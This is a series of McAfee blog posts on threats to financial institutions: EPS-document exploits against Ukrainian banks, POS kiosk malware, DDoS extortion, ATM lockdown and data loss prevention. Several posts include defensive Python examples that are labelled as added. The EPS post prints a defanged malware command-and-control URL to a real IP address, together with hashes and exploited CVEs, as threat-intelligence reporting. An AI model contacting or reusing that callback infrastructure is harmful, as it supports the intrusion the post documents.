A search for these strings shows that they are lyrics from the song ‘Snuff’ by Slipknot.

Ha, maybe our actors are metalheads or simply using it as a distraction.
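The triage steps described above (treat the .docx as a zip, pull out the embedded EPS, look at its free-text comments, and check docProps for URLs) can be scripted. The following is an added example, not McAfee tooling: it builds a minimal .docx in memory so it runs offline, with an embedded EPS carrying the two ‘%%’ strings quoted above and a docProps/app.xml holding a placeholder URL that stands in for the one the analysts found. The file layout, the benign-host filter and the “bare DSC comment” heuristic are my assumptions.

```python
"""Triage a .docx (a zip container) for embedded EPS parts and odd metadata.

Added example, not McAfee tooling. It builds a minimal .docx in memory so it
runs offline: the embedded EPS carries the two '%%' comment strings quoted in
the post, and docProps/app.xml holds a placeholder URL standing in for the
one the analysts found.
"""
import io
import re
import zipfile

# Constructed EPS body: only the two free-text '%%' lines come from the post.
SAMPLE_EPS = b"""%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 100 100
%%Icantdestroywhatisntthere
%%Myheartisjusttoodarktocare
/x 1 def
showpage
"""

# Constructed app.xml; the URL is a placeholder, not an indicator.
SAMPLE_APP_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">
<Application>Microsoft Office Word</Application>
<HyperlinkBase>http://example.invalid/placeholder</HyperlinkBase>
</Properties>
"""

URL_RE = re.compile(rb"https?://[^\s<>\"']+")
# Standard DSC comments carry a colon (%%BoundingBox:); a bare '%%word' line
# with no colon is free text and worth a look, as in the sample above.
BARE_DSC_COMMENT_RE = re.compile(rb"^%%([A-Za-z][A-Za-z0-9]*)[ \t]*$", re.MULTILINE)
# Namespace URLs every Office document carries; not interesting on their own.
BENIGN_URL_HOSTS = (b"schemas.openxmlformats.org", b"schemas.microsoft.com",
                    b"www.w3.org", b"purl.org")


def build_sample_docx() -> bytes:
    """Assemble a minimal .docx in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/media/image1.eps", SAMPLE_EPS)
        zf.writestr("docProps/app.xml", SAMPLE_APP_XML)
    return buf.getvalue()


def triage_docx(data: bytes) -> dict:
    """List embedded EPS parts, their bare %% comments and URLs in docProps."""
    findings = {"eps_parts": [], "bare_eps_comments": [], "docprops_urls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            content = zf.read(name)
            lower = name.lower()
            # Match on extension or on the PostScript header, since a part
            # can be renamed to hide what it is.
            if lower.endswith(".eps") or content.startswith(b"%!PS-Adobe"):
                findings["eps_parts"].append(name)
                for m in BARE_DSC_COMMENT_RE.finditer(content):
                    findings["bare_eps_comments"].append(
                        m.group(1).decode("ascii", "replace"))
            if lower.startswith("docprops/"):
                for m in URL_RE.finditer(content):
                    url = m.group(0)
                    if not any(host in url for host in BENIGN_URL_HOSTS):
                        findings["docprops_urls"].append(url.decode("ascii", "replace"))
    return findings


if __name__ == "__main__":
    for key, items in triage_docx(build_sample_docx()).items():
        print(key, items)
```

Point the same `triage_docx` at the bytes of a real attachment to get the list of EPS parts to hand to a sandbox, the odd comment strings to pivot on, and any URL in the document properties to check against threat intelligence.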

When we ran the EPS file through our tools, it was flagged as CVE-2015-2545 and CVE-2017-0262, both vulnerabilities that crafted EPS files exploit to compromise the system opening them.

Once the malware has managed to infect a system, it tries to connect to a server based in France over TCP port 80:

hxxp://137.74.224.142/z/get.php?name=3c6*****

This IP address has a reputation for ‘badness’ across multiple campaigns, including spam distribution.

To prevent this attack from succeeding, we recommend that Microsoft’s security patches be installed on endpoints immediately. These patches address the following CVEs:

  • CVE-2015-2545
  • CVE-2017-0261
  • CVE-2017-0262

McAfee customers using our endpoint solutions are protected from this threat by a signature called “Exploit-CVE2015-2545.l”.

Hashes of files we received:

  • ecc055974d7d190871dc4eb1bf1f8b998d6e8abf04dba2ff560ae395aeec4d5d
  • 430c1bfa22e0f7b0e8742c0d70b8911089ba58645818e4281d7066d1324a3952
  • 1892154cc47e8a1bc81186d131e001a22e4edbc4fd88688eb1782b934e1941b6
  • e9d843761df7f6ef193d9f8e88d93a90816f2067fdd51a1c0765dfbfd4cb398f
  • 647572d133677882f52843f799375ac77178616bcd3d9ed13b95d49eecfd0a51

The post Ukrainian Financial Institutions Targeted by Wave of Malicious EPS File Attacks appeared first on McAfee Blogs.

POS Malware Steals Payment Card and Personal Info from Food Kiosks
https://securingtomorrow.mcafee.com/business/pos-malware-steals-payment-card-personal-info-food-kiosks/ Tue, 18 Jul 2017 19:00:57 +0000

Point-of-sale malware can make its way into almost anything these days, from massive corporate systems to individual devices. The latest victim is Avanti Markets, a leading “micro market” vending company hit with malware that has stolen payment and possibly fingerprint data from self-service payment kiosks in various locations.

The cybercriminals likely breached the kiosk provider’s network and used infected Windows computers as a beachhead in the attack. From there, POS malware can bypass some encryption technology and grab unprotected card data out of the volatile memory of a POS device. In any case, it appears Avanti had not rolled out encryption on all of its devices prior to the attack.

POS malware is also typically written to attack unique and widely used POS systems, and versions have been found that attack specific restaurant and gas station software kits. The attackers in this case used a Poseidon toolkit developed in 2015.

After investigating the attack, officials said it appears the malware gathered cardholders’ first and last names, credit/debit card numbers, and expiration dates. In addition, users of the Market Card option may have had their names and email addresses compromised. And although biometric information was at risk in this attack, it seems stored fingerprint data has not been compromised.

Avanti states that 1,900 devices were affected, but the true extent of the breach is still unknown. Imitation attacks may soon follow, and the publicity gained by the Avanti attack may be used by attackers in phishing scams to lure Avanti users into further revealing their credit card data.

The good news is Avanti has offered credit monitoring to impacted customers. However, to ensure their financial data is secure, customers should also keep a close eye on their bank accounts to look for any fraudulent activity.

To learn more about this POS malware attack and others like it, follow us at @McAfee and @McAfee_Business.

The post POS Malware Steals Payment Card and Personal Info from Food Kiosks appeared first on McAfee Blogs.

Cyberattacks and Financial Services: Good News, Bad News
https://securingtomorrow.mcafee.com/business/cyberattacks-financial-services-good-news-bad-news/ Thu, 29 Jun 2017 23:00:17 +0000

As highlighted in the Verizon 2017 Data Breach Investigations Report, the financial services sector continues to be a target of cyberattacks. That said, the trend has also shifted to other verticals, such as healthcare with the recent WannaCry attack and other hospital data breaches. One hopes, as the report suggests, that banks’ significant investments have paid off, and that the reduction in overall incidents is a demonstration of their improved security posture. Of the reported attacks, most were associated with DDoS, and the rest were primarily skimming efforts used to steal card data.

Account takeovers continue to be a pestilence for the banking industry, although improvements in fraud detection and authentication have reduced the success of these attacks. Meanwhile, insider privilege misuse continues to rise, and banks will clearly need to invest more in their systems and behavioral analytics to protect themselves.

These types of security improvements may have reduced the number of financial services breaches. On the other hand, we must also examine an alternate theory: that the sheer availability of financial data has reduced its value and, therefore, prompted criminals to seek more fruitful avenues, for example health care data and its rich bounty of Social Security numbers and other personal identifiers. Analysts of the U.K. health system’s WannaCry breach estimate that medical information could be worth ten times more than credit card numbers on the Dark Web.

Even in these cases, however, cybercriminals often seek to monetize attacks. Their activity will often still touch financial institutions, who will continue to bear the brunt of monetary losses associated with cybercrime regardless of the originally targeted industry.

Further, we can expect to see a rise in mobile and cloud-based attacks as these technologies gain consumer adoption. To blunt these threats, communication across the financial industry and across vertical industry lines will be one of the best defenses as the business of cybercrime continues to keep pace with the technical evolution.

The post Cyberattacks and Financial Services: Good News, Bad News appeared first on McAfee Blogs.

Show me the money – Financial Services Need to Rethink Security
https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/ Thu, 22 Jun 2017 04:05:58 +0000

Financial institutions are under attack. As gatekeepers to consumers’ and enterprises’ most personal and private information, this industry serves as one of the most lucrative avenues for cybercriminals to pursue. In response, financial services organizations have developed unsustainable security infrastructures that are characterized by a huge proliferation of tools to address “the next big thing” in cyber threats.

As highly publicized breaches continue against financial institutions, organizations are stuck in a frustratingly reactive cycle: with every emerging attack, a new tool or widget is added to an already complex arsenal of security solutions. This stockpile of tools often lacks automation and Big Data analytics capabilities, preventing IT teams from cataloging and responding to threats in a timely manner. Over time, organizations are left struggling to patch holes and close siloed security gaps, always looking to identify the next vulnerability, which makes it difficult to get ahead.

The industry must move beyond this segregated approach to better protect itself and its customers. According to Closing the Cybersecurity Gaps in Financial Services, a global survey by Ovum sponsored by McAfee, an overwhelming number of financial institutions, especially Tier 1 and 2, deploy between 100 and 200 disparate security solutions. The report also finds that three percent of global financial services institutions use over 100 security solutions, reducing effectiveness, creating additional operational cost and increasing their organization’s cyber risk exposure. Adding to security teams’ burdens, 37 percent of respondents deal with over 200,000 daily security alerts. Security teams are overwhelmed with sifting through and prioritizing the vast number of alerts that each security tool generates, often with limited threat intelligence sharing between the various tools in a cohesive and adaptive manner. The sheer amount of manpower required to accurately sift through each alert drains resources and leaves security teams drowning in IT complexity. Not surprisingly, over a third of respondents across EMEA, the US and APAC listed integrating and maintaining disparate security tools as their top operational pain point.

Financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe. Petabytes of data, billions of messages and transactions flow across this interconnected system on a daily basis and make it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real-time. These worries are corroborated by the Ovum study, where 40 percent of respondents indicated that faster threat discovery is their first or second security priority. To enable quicker threat detection, over 70 percent of organizations are planning strategic investments in cloud, web and ATM security.

Ovum highlights some promising trends that point towards a better, more secure future for these organizations. Financial institutions have undergone a significant shift in the decision-making process for cybersecurity initiatives, with teams outside IT such as fraud, compliance, risk management and operations all now taking part. Forty-eight percent of respondents from the fraud team reported they were a decision maker in their company’s cybersecurity initiatives, followed by compliance and risk management – both reporting over 37 percent. This shift highlights the high priority level that financial institutions have put on cybersecurity, which is well-warranted considering that breaches will have severe consequences that reach as far as to fraud, insider/outsider collusion, regulatory compliance and legal. In this regard, these organizations are regarded as the gold standards that all other industries should aspire to.

The financial services industry is in the beginning stages of another industry-wide shift, as over 60 percent of respondents agree that the industry needs better, not more, security tools, which will ultimately enable greater automation, integration and orchestration of tasks, as well as end-to-end visibility across the security infrastructure. The next big financial breach continues to be one of the biggest concerns in the financial services industry, constantly serving as a reminder to organizations for the need of a unified and fully implemented security strategy. Greater automation, integration and orchestration are necessary first steps to provide relief to these teams, which can only be delivered through a unified threat defense architecture. The transformation to an open source communications fabric offers a significant impact on the efficiency and effectiveness for organizations by simplifying the integration of disparate tools and enabling the sharing of threat data.

Join McAfee and a host of financial experts for Transforming Cybersecurity in Financial Services, a free webinar on Thursday, June 22, 2017, at 10 a.m. EST to learn more on current gaps and challenges in financial IT security, emerging threat vectors and attacks, use of machine learning and advanced analytics, best practices that can benefit financial institutions and the path forward.


The post Show me the money – Financial Services Need to Rethink Security appeared first on McAfee Blogs.

Widening Threat Surface and Security Gaps
https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/ Tue, 28 Mar 2017 19:12:40 +0000

This blog was written by Maneeza Malik.

Digital transformation, the rise of mobile banking, ongoing migration of core banking services to the cloud and a shift towards an omni-banking model have all contributed to an overall wider threat landscape for financial institutions to monitor and manage. This is further exacerbated by the fact that financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe.

Petabytes of data, billions of messages and transactions flow across this interconnected system on a daily basis and make it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real time. Cybercriminals have the potential to launch a large-scale attack by infiltrating and exploiting one ‘weak link’ in this interconnected system, targeting multiple financial institutions in various geographies simultaneously. This has vastly elevated the risk of “systemic” consequences for the industry at large.

On top of that, financial institutions have the added burden of operating in an environment where system, process and security silos prevail. With hundreds of disparate security tools deployed, they are constantly struggling to patch holes and close gaps in their threat defense lifecycle. Security teams are often overwhelmed with sifting through and prioritizing the vast number of alerts that each security tool generates, often with limited threat intelligence sharing between the various tools in a cohesive and adaptive manner.

In a recent study issued by Morgan Stanley (1), it was reported that better security tools with tighter integration and automation are needed. Suffice it to say that as the financial services industry and the world at large rapidly march towards further digital transformation, the challenge of bridging the security gaps will become increasingly difficult in an industry whose very “foundation” is built on an interconnected system linking financial institutions, payment and settlement processors and various other entities, including the third-party providers that financial institutions work with globally.

So now, the pressure is on everyone (and not just the top G20 financial institutions) to prevent cyberattacks at the scale we saw in in 2016 with the Bangladesh Bank, SWIFT, and the Federal Reserve Bank of NY. Or the Carbanak attack on multiple financial institutions resulting in nearly $1 billion in losses the year prior.

The path forward will require implementing multiple steps:

  • Implement a unified threat defense security infrastructure, one where financial institutions pivot away from disparate security solutions that have created yet another layer of silos in an already complex and fragmented technology landscape. This means security solutions need to work in an integrated, automated and adaptive manner.
  • Adopt a communication fabric built on open standards, enabling your business to easily integrate your disparate security solutions into a cohesive and adaptive threat defense lifecycle. To do that, consider a solution, such as McAfee Open DXL, that can help your institution share information easily across your security infrastructure.
  • Adopt greater collaboration practices across the industry, bringing in both the security vendor community and more banks, not just the top 100 or G20 banks. This is a burden that needs to be carried by all and not just a few.
  • The creation of hunter teams needs to become more pervasive in the industry and a best practice (switching from reactive to proactive mode); for more on this, read our paper on the big attacks of 2016.
  • While the industry neither needs nor would welcome yet another regulation, this is one area where a global cybersecurity regulation is required. This is not to penalize a handful of banks, but rather to protect an interconnected ecosystem where hundreds and thousands of entities are connected to the financial system. Everyone needs to follow the same set of guidelines and regulatory stipulations.

The post Widening Threat Surface and Security Gaps appeared first on McAfee Blogs.

Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals
https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/ Mon, 30 Jan 2017 18:51:59 +0000

This blog was written by Maneeza Malik.

In a matter of 48 hours, over 20 million customers couldn’t check their bank accounts online. And it’s all because of two people. Two cybercriminals, to be exact, who worked in tandem to conduct a DDoS (distributed denial of service) attack against Lloyds Banking Group. The end goal? Demand a ransom from the banking group, which they knew would be desperate to restore access for its irritated customers.

So how exactly did this DDoS attack work? To start, the cybercriminals bombarded the widely used British bank’s online platform with millions of fake requests designed to grind the group’s systems to a halt. That halt lasted almost three days, denying access to millions upon millions of customers across the U.K.

Then, the pair sent an email to a Lloyds Bank executive, pretending to be a consultant offering to restore the bank’s system and get it back online for a small fee of 100 Bitcoin (£75,000 / $94,000). Luckily, the disguised ransom extortion failed, as the cybercriminals’ bitcoin address still has a zero balance with zero transactions made. As an added bonus, it seems no accounts were hacked or compromised during the attack, and service has returned to normal.

Lloyds’ IT security experts are to thank for that: they “geo-blocked” the source of the attack, a technique that effectively drops a portcullis over the servers launching the attack but also stops legitimate customer requests from that area.

Though no customer data has been stolen and service is back online, this cyberattack is an unfriendly reminder about the nature of DDoS attacks, their ability, and their true impact.

Joe Bernik, McAfee CTO for Financial Services, noted that the attack is nothing new, but attacks like it aren’t going anywhere. “As one of the oldest forms of internet-borne attacks, DDoS attacks are effective and popular because the internet architecture and protocols it uses easily lend themselves to this form of attack. Therefore, it makes sense that the attack on Lloyds’ banking platform is similar to the DDoS attacks that impacted large U.S. banks in 2013 and 2014 as well.”

Bernik continued, “Adding to this ease, DDoS attacks are highly visible by nature, and easy to perform, given the availability of ‘for hire’ botnets. It’s also important to remember that—especially in cases like Lloyds Bank—a DDoS attempt can be part of a larger attack and could just be a detractor used to redirect security resources.”

Indeed, such attacks are something all banks need to be aware of in order to be on high alert. They need to look for threats and evasive attacks across their entire network and across all omni-banking touch points.

There is nothing unique here. Yes, DDoS attacks are here to stay, as are cyber threats and attacks of all sorts. The bigger question is how banks shift their security posture to take a more offensive stance rather than only standing at the other end of the fire hose. Granted, that is easier said than done. They also need greater visibility, a holistic view of their security posture, rather than multiple myopic lenses that may hamper the ability to proactively detect and block attacks. What did we learn about this attack on Lloyds Bank? That customers started to report that they could not access their accounts, which then triggered an alert. Detecting and blocking attacks at the onset will continue to be both a challenge and a desired goal for banks, whether the threat is a DDoS attack, a zero-day attack or some other evolving and emerging threat.

The post Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals appeared first on McAfee Blogs.

Five Ways to Improve ATM Security Using McAfee Integrity Control
https://securingtomorrow.mcafee.com/business/five-ways-improve-atm-security-using-mcafee-integrity-control/ Tue, 18 Oct 2016 15:00:12 +0000


This blog post was written by Teresa Wingfield.

Given retail banking customers’ never-ending appetite for greater ATM self-service functionality at ever more locations, it’s not surprising that banks are having trouble delivering rigorous security. According to a recent Forrester Consulting study commissioned by Diebold [1], financial institutions lack confidence in their current ATM security. Even though 21 to 30% of all their in-house security efforts are devoted to ATMs, technology and resource issues create challenges for keeping up with frequently changing ATM security needs and compliance requirements. Forrester goes on to say that financial institutions consider partners for support but are concerned about handing over control.

What is McAfee Integrity Control?

McAfee Integrity Control provides security for fixed-function devices such as ATMs to help address many of the concerns raised by Forrester. It combines whitelisting and change control to block unauthorized applications and change.

Whitelisting is a simple, yet effective solution. A whitelist is a list of trusted applications that are allowed to execute. So, when an unknown threat tries to run, it can’t because it’s not in the whitelist.

Change control consists of file integrity monitoring and change prevention, important ways to identify and stop security risks. Integrity monitoring provides real-time visibility of change events and sends alerts when there are critical and unauthorized changes. Change prevention provides the ability to enforce making only authorized changes and performing them within the pre-set boundaries as defined by corporate policy.

Why McAfee Integrity Control for ATMs?

Let’s take a look at some specific examples of how McAfee Integrity Control can help retail banks tackle some of their toughest ATM security challenges.

  1. Simplifying Security Implementation — Thieves can use malware to drain an ATM’s cash or steal account numbers and PINs. However, malware protection for a network of ATMs can be difficult to implement when it relies on virus signatures: you have to ensure that the .DAT files containing the signatures are distributed and kept up to date on every machine. McAfee Integrity Control, on the other hand, locks down ATMs without requiring signatures. This is a more efficient approach that prevents unauthorized software such as malware from running at all.
  2. Keeping ATMs Up-to-Date — Banks need to safely make large volumes of ATM software updates without visiting each ATM for every update. McAfee Integrity Control makes it possible to implement and automate a change management process for ATMs without human intervention, using trusted updaters that are approved sources of change.
  3. Solving the Remote ATM Service Challenge — McAfee Integrity Control allows certified and authorized updates to be easily created and distributed to the personnel servicing ATMs, limiting the scope to only the changes authorized for the maintenance window. Even if the technician has “Admin” login privileges, McAfee Integrity Control will not allow additional alterations to the ATM.
  4. Improving ATM Security Compliance — Change Audit, a key feature of McAfee Integrity Control, supports accountability and audits by identifying the time and source of changes, the files that were changed, and the user logged in to the system when the changes were made. Having this level of control for ATMs delivers end-to-end continuous compliance by both knowing about and stopping unauthorized and unwanted changes.
  5. Meeting the Needs of Fixed-Function Devices — An ATM is a fixed-function device, meaning it has a fixed CPU and memory. McAfee Integrity Control delivers minimal impact on the performance of fixed-function devices thanks to its low memory and CPU usage and because it has no file scanning requirement.
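To make the whitelisting and change-control ideas above concrete, here is an added example written for this page; it is not McAfee Integrity Control code and does not reflect how that product is implemented. It models an application allowlist enforced by file hash (an unknown binary cannot run regardless of signatures), change prevention that accepts writes only from a trusted updater account inside a maintenance window, integrity monitoring that reports files altered on disk, and a change audit trail recording when, what, who and whether the change was allowed. The file paths, file contents, account names, timestamps and policy values are all constructed for illustration.

```python
"""Added example, not McAfee Integrity Control code: an application allowlist
enforced by file hash, plus change control (integrity monitoring, change
prevention with trusted updaters and a maintenance window, and a change audit
trail). File contents, paths, account names and the policy values are all
constructed for illustration."""
import hashlib
from dataclasses import dataclass, field
from datetime import datetime, time


def sha256_of(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


# Constructed approved ATM software image: path -> approved file content.
APPROVED_IMAGE = {
    "C:/atm/app/cashdispenser.exe": b"approved dispenser binary v4.2",
    "C:/atm/app/pinpad.dll": b"approved pinpad library v1.9",
}

# Constructed change-control policy: only this service account is a trusted
# updater, and it may change files only inside the nightly maintenance window.
TRUSTED_UPDATERS = {"svc-atm-updater"}
MAINTENANCE_WINDOW = (time(1, 0), time(4, 0))


@dataclass
class AuditRecord:
    """Change Audit: when, what, who, and whether the change was allowed."""
    when: datetime
    path: str
    user: str
    allowed: bool
    reason: str


@dataclass
class IntegrityControl:
    baseline: dict                      # path -> approved SHA-256
    audit: list = field(default_factory=list)

    def may_execute(self, content: bytes) -> bool:
        """Whitelisting: a binary runs only if its hash is in the approved baseline.
        No signature database is consulted; unknown code is simply not allowed."""
        return sha256_of(content) in set(self.baseline.values())

    def propose_change(self, path: str, new_content: bytes,
                       user: str, when: datetime) -> bool:
        """Change prevention: a write is accepted only from a trusted updater
        inside the maintenance window. Every decision is recorded for audit."""
        new_hash = sha256_of(new_content)
        if self.baseline.get(path) == new_hash:
            allowed, reason = True, "no change"
        elif user not in TRUSTED_UPDATERS:
            allowed, reason = False, "user is not a trusted updater"
        elif not (MAINTENANCE_WINDOW[0] <= when.time() <= MAINTENANCE_WINDOW[1]):
            allowed, reason = False, "outside maintenance window"
        else:
            allowed, reason = True, "authorized update"
            self.baseline[path] = new_hash      # the approved build becomes executable
        self.audit.append(AuditRecord(when, path, user, allowed, reason))
        return allowed

    def drift(self, observed: dict) -> list:
        """Integrity monitoring: paths whose on-disk content differs from baseline."""
        return [p for p, content in observed.items()
                if self.baseline.get(p) != sha256_of(content)]


def demo() -> dict:
    """Walk the scenarios from the list above on the constructed image."""
    ctl = IntegrityControl({p: sha256_of(c) for p, c in APPROVED_IMAGE.items()})
    out = {}
    # Unknown binary (standing in for ATM malware) is denied without any signature.
    out["malware_blocked"] = not ctl.may_execute(b"unknown dropper payload")
    # A technician with admin rights patching outside the process is refused.
    out["admin_refused"] = not ctl.propose_change(
        "C:/atm/app/pinpad.dll", b"ad-hoc patched pinpad", "tech-admin",
        datetime(2016, 10, 3, 14, 30))
    # The trusted updater inside the window is accepted, and only then does the
    # new build become executable.
    applied = ctl.propose_change(
        "C:/atm/app/pinpad.dll", b"approved pinpad library v2.0", "svc-atm-updater",
        datetime(2016, 10, 4, 2, 15))
    out["update_applied"] = applied and ctl.may_execute(b"approved pinpad library v2.0")
    # Integrity monitoring reports a file altered on disk behind the policy's back.
    on_disk = {"C:/atm/app/cashdispenser.exe": b"tampered dispenser binary",
               "C:/atm/app/pinpad.dll": b"approved pinpad library v2.0"}
    out["drift"] = ctl.drift(on_disk)
    out["denied_changes"] = sum(1 for r in ctl.audit if not r.allowed)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order of checks in propose_change is the point of the design: the updater identity is checked before the time window, so a technician with local admin rights is refused even during maintenance hours, and a new hash only enters the allowlist after an authorized change, which is what keeps the "no signatures needed" model from turning into "anything an admin drops on disk can run".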

Summary

Click here to learn more about how McAfee Integrity Control can help you deliver stronger security and compliance for your ATMs using fewer resources.

[1] Forrester Research on ATM Security: How Prepared Are You?, March 16, 2016, http://blog.dieboldnixdorf.com/forrester-research-on-atm-security-pt1/#.V_Kd8u_rtaQ
The post Five Ways to Improve ATM Security Using McAfee Integrity Control appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Delves Into Dangers of Data Loss
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-delves-into-dangers-of-data-loss/
Mon, 26 Sep 2016 11:01:27 +0000

The post ‘McAfee Labs Threats Report’ Delves Into Dangers of Data Loss appeared first on McAfee Blogs.

This blog post was written by Rick Simon.

Data is leaking out of your organization: accidentally or intentionally, by internals or externals, physically or electronically. During the past year, we have performed extensive research to identify what data is being targeted, who is taking it, how they are getting it out, and the best practices to reduce your exposure to data loss.

We found that most organizations do not realize that they are leaking data. Between 50% and 80% of data breaches are discovered by outside entities, typically when the data is used or sold. According to the 2016 Verizon Data Breach Investigation Report, internal discovery of breaches has been on a downward trend for 10 years.

It should be no surprise that data thefts are usually about the money or that between 60% and 80% of them are conducted by external agents. However, that still means that 20% to 40% of data loss is the result of intentional or accidental actions by people on the inside. Physical media, such as USB keys and laptops, are the most common method of data loss from internals, but fewer than 40% of organizations surveyed are watching these devices closely enough to catch them.

Organizations with data loss prevention (DLP) systems should be well positioned to block data leakage, but many do not appear to be using the tools to their best advantage. Data loss is increasingly happening with unstructured data, such as office documents, yet many organizations do not monitor unstructured data. Relying solely on regular expressions, which is a common method to find things such as credit card or social security numbers, leaves too much valuable information unmonitored.
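To show why regex-only monitoring leaves unstructured data exposed, here is an added example written for this page; it is not McAfee DLP code. A first layer finds structured identifiers with a card-number regex plus a Luhn check (so order numbers that merely look like cards are not flagged), and a second layer handles unstructured documents by fingerprinting a registered sensitive file with hashed word shingles and by looking for classification markings. The registered briefing, the outbound messages, the card numbers and the 30% overlap threshold are all constructed.

```python
"""Added example, not McAfee's DLP product code: a regex-only detector for
structured identifiers (card numbers, Luhn-validated) beside a second layer that
handles unstructured documents by fingerprinting registered files and by
classification markings. The registered document, outbound messages, card
numbers and thresholds below are all constructed."""
import hashlib
import re

# 13-19 digits with optional space/dash separators (the structured-data rule).
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used to drop numbers that merely look like cards."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list:
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


def shingles(text: str, k: int = 5) -> set:
    """Hashed k-word shingles: a fingerprint of a document's wording, so a
    partially pasted or lightly edited copy still overlaps the registered original."""
    words = re.findall(r"[a-z0-9]+", text.lower())
    return {hashlib.sha256(" ".join(words[i:i + k]).encode()).hexdigest()
            for i in range(max(1, len(words) - k + 1))}


class DlpPolicy:
    def __init__(self, registered: dict, marking=r"\bCONFIDENTIAL\b", threshold=0.3):
        self.fingerprints = {name: shingles(text) for name, text in registered.items()}
        self.marking = re.compile(marking)
        self.threshold = threshold   # constructed: 30% shingle overlap counts as a match

    def regex_only(self, text: str) -> bool:
        """What a regex-only deployment sees."""
        return bool(find_card_numbers(text))

    def inspect(self, text: str) -> dict:
        """Structured rule plus the two unstructured-data checks."""
        reasons = []
        cards = find_card_numbers(text)
        if cards:
            reasons.append(f"{len(cards)} card number(s)")
        if self.marking.search(text):
            reasons.append("classification marking present")
        s = shingles(text)
        for name, fp in self.fingerprints.items():
            overlap = len(s & fp) / len(fp)
            if overlap >= self.threshold:
                reasons.append(f"{overlap:.0%} overlap with registered document {name!r}")
        return {"block": bool(reasons), "reasons": reasons}


# Constructed registered sensitive document: unstructured, no identifiers in it.
REGISTERED = {
    "q3-board-briefing": (
        "Board of directors briefing. Proposed acquisition of Example Corp at "
        "2.1 billion dollars closes in November pending regulatory approval. "
        "Do not distribute outside the executive team."),
}

# Constructed outbound messages.
OUTBOUND = {
    "card":     "Customer 4111 1111 1111 1111 called about a refund on her order.",
    "briefing": ("Draft mail: proposed acquisition of Example Corp at 2.1 billion "
                 "dollars closes in November pending regulatory approval. Thoughts?"),
    "order":    "Your order number is 4111 1111 1111 1112, shipping tomorrow.",
    "marked":   "CONFIDENTIAL: roadmap discussion notes attached.",
}


def evaluate() -> dict:
    """Map each message name to (regex_only_blocks, layered_policy_blocks)."""
    policy = DlpPolicy(REGISTERED)
    return {name: (policy.regex_only(t), policy.inspect(t)["block"])
            for name, t in OUTBOUND.items()}


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name}: regex-only={verdict[0]} layered={verdict[1]}")
```

The "briefing" message is the case the paragraph is about: it carries no card or social security number, so the regex layer passes it, while the shingle overlap with the registered board briefing flags it. The "order" message shows the other side of the same problem, a pattern match that the Luhn check correctly discards, which matters because false positives are what make teams turn monitoring down.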

On average, the IT professionals we surveyed reported dealing with about 20 incidents per day, but there was a tremendous range. Small companies and those in the Asia-Pacific region tend to run below average, while large companies, especially those in financial services and retail, tend to run higher than average. Because false negatives, or data loss that does not trigger an incident alert, are one of the challenges with DLP systems, we found that configuring systems to watch more actions is an important part of reducing the likelihood of data loss.

On the positive side, we found that 85% of all organizations surveyed delivered regular security awareness training to keep the importance of data protection fresh in people’s minds. Teaching employees how to recognize the value of the data they are processing makes the issue real for their particular jobs. Automatic pop-ups that notify them when they are doing something potentially risky are a great reminder, and do not consume a lot of resources.

For more information on this research, download the McAfee Labs Threats Report: September 2016.

Who Let the Data Out? Who, Who, Who, Who? (Part 1 of 3)
https://securingtomorrow.mcafee.com/business/data-security/let-data-part-1-3/
Mon, 19 Sep 2016 15:00:08 +0000

The post Who Let the Data Out? Who, Who, Who, Who? (Part 1 of 3) appeared first on McAfee Blogs.

Nowadays, everyone knows how important data is. Who hasn’t seen a sensational news story about a data breach lately? Despite all this public exposure, however, not everyone is qualified to protect organizations against breaches. It takes more than binge-watching a season of Mr. Robot to become a cybersecurity expert, or many of us would be out of a job! In this industry, the right knowledge defends organizations against attack. And to gain it, the six “w” questions are as important as ever: who, what, when, where, why, and how?

To find the answers, Ponemon Institute conducted a seven-nation survey of 1,000 IT decision-makers in financial services, healthcare, government, manufacturing, and retail organizations, to develop benchmarks for data loss prevention incidents, visibility, and maturity. The primary goal of this research was to understand and compare the number of data protection incidents that organizations deal with on a daily basis and the factors that influence this. Aggregating the results of this report with previous information from the Verizon DBIR and Grand Theft Data: 2015 McAfee Data Exfiltration Study gives us a bird’s-eye view of all things DLP.

Rolling in The Deep Takeaways

What were the conclusions? For starters, we’ve confirmed the Wu-Tang saying “cash rules everything around me” to still be true: financial motives are behind 89% of data breaches. This has been an upward trend since 2013. So organizations with easily monetized data, such as credit card and payment information, are at higher risk of attack. At the same time, we’re also seeing perpetrators seize more opportunities to profit from other data, such as health records.

